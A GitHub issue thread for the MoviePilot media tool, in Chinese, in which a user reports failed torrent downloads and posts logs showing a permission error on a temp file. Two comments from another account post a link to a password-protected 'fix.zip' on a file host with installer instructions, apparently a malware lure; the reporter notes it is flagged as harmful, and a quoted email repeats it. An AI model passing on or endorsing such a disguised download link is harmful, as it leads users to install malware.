### ISSUE TITLE
订阅提示种子数据有误，无法下载种子，导致订阅失败

### ISSUE THREAD

**Issue by chenxiaolong818** [jxxghp/MoviePilot#2657]
### 确认

- [X] 我的版本是最新版本，我的版本号与 [version](https://github.com/jxxghp/MoviePilot/releases/latest) 相同。
- [X] 我已经 [issue](https://github.com/jxxghp/MoviePilot/issues) 中搜索过，确认我的问题没有被提出过。
- [X] 我已经 [Telegram频道](https://t.me/moviepilot_channel) 中搜索过，确认我的问题没有被提出过。
- [X] 我已经修改标题，将标题中的 描述 替换为我遇到的问题。

### 当前程序版本

v1.9.14

### 运行环境

Docker

### 问题类型

主程序运行问题

### 问题描述

订阅不可众《斩神》动画，无法识别种子信息，提示种子有问题。不过我单独下载斩神种子用qb下载，一点问题没有。本网站其他订阅的动画就没有这个问题。后来我升级到最新版，问题依旧。

### 发生问题时系统日志和配置文件

```bash
软件版本
v1.9.14
[最新](https://github.com/jxxghp/MoviePilot/releases)
前端版本
v1.9.14-1
认证资源版本
1.3.2
站点资源版本
1.4.6
配置目录
/config
数据目录
/moviepilot
时区
Asia/Shanghai

日志：
【INFO】2024-08-26 19:22:34,618 - subscribe.py - 斩神之凡尘神域 (2024) 季 1 更新缺失集数为11 ...
【INFO】2024-08-26 19:22:34,617 - subscribe.py - 斩神之凡尘神域 (2024) 未下载完整，继续订阅 ...
【INFO】2024-08-26 19:22:34,616 - download.py - 成功下载种子数：0，剩余未下载的剧集：{259231: {1: NotExistMediaInfo(season=1, episodes=[5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15], total_episode=15, start_episode=1)}}
【INFO】2024-08-26 19:22:34,614 - download.py - Zhan Shen Zhi Fan Chen Shen Yu S01E05 2024 2160p WEB-DL H265 DDP2.0-ADWeb 种子下载失败！
【INFO】2024-08-26 19:22:33,814 - command.py - 处理事件：notice.message - []
站点：观众，userid=None
【INFO】2024-08-26 19:22:33,811 - chain - 发送消息：channel=None，title=Zhan Shen Zhi Fan Chen Shen Yu S01E05 2024 2160p WEB-DL H265 DDP2.0-ADWeb 种子下载失败！, text=错误信息：种子数据有误，请确认链接是否正确
【ERROR】2024-08-26 19:22:33,809 - download.py - 下载种子文件失败：Zhan Shen Zhi Fan Chen Shen Yu S01E05 2024 2160p WEB-DL H265 DDP2.0-ADWeb - https://audiences.me/download.php?id=（省略）
【ERROR】2024-08-26 19:22:33,806 - torrent.py - 种子文件解析失败：[Errno 13] Permission denied: '/config/temp/[Audiences].斩神之凡尘神域.Zhan.Shen.Zhi.Fan.Chen.Shen.Yu.S01.2024.2160p.WEB-DL.H265.DDP2.0-ADWeb.torrent'
【INFO】2024-08-26 19:22:32,734 - download.py - 开始下载种子 Zhan Shen Zhi Fan Chen Shen Yu S01E05 2024 2160p WEB-DL H265 DDP2.0-ADWeb ...
【INFO】2024-08-26 19:22:32,733 - download.py - 开始电视剧多集拆包匹配：{259231: {1: NotExistMediaInfo(season=1, episodes=[5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15], total_episode=15, start_episode=1)}}
The server responded with: {'ok': False, 'error': 'channel_not_found'}
```

**Comment by chenxiaolong818** [comment]
发现《剑来》也是这个情况，明明都找到了种子的下载链接，就是不下载，提示种子信息有误

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chenxiaolong818** [comment]
这发的是什么文件？为什么会提示是有害文件，不允许下载？



------------------&nbsp;原始邮件&nbsp;------------------
发件人: ***@***.***&gt;; 
发送时间: 2024年8月26日(星期一) 晚上8:34
收件人: ***@***.***&gt;; 
抄送: ***@***.***&gt;; ***@***.***&gt;; 
主题: Re: [jxxghp/MoviePilot] 订阅提示种子数据有误，无法下载种子，导致订阅失败 (Issue #2657)














 
Download
 https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
 password: changeme
 In the installer menu, select "gcc."
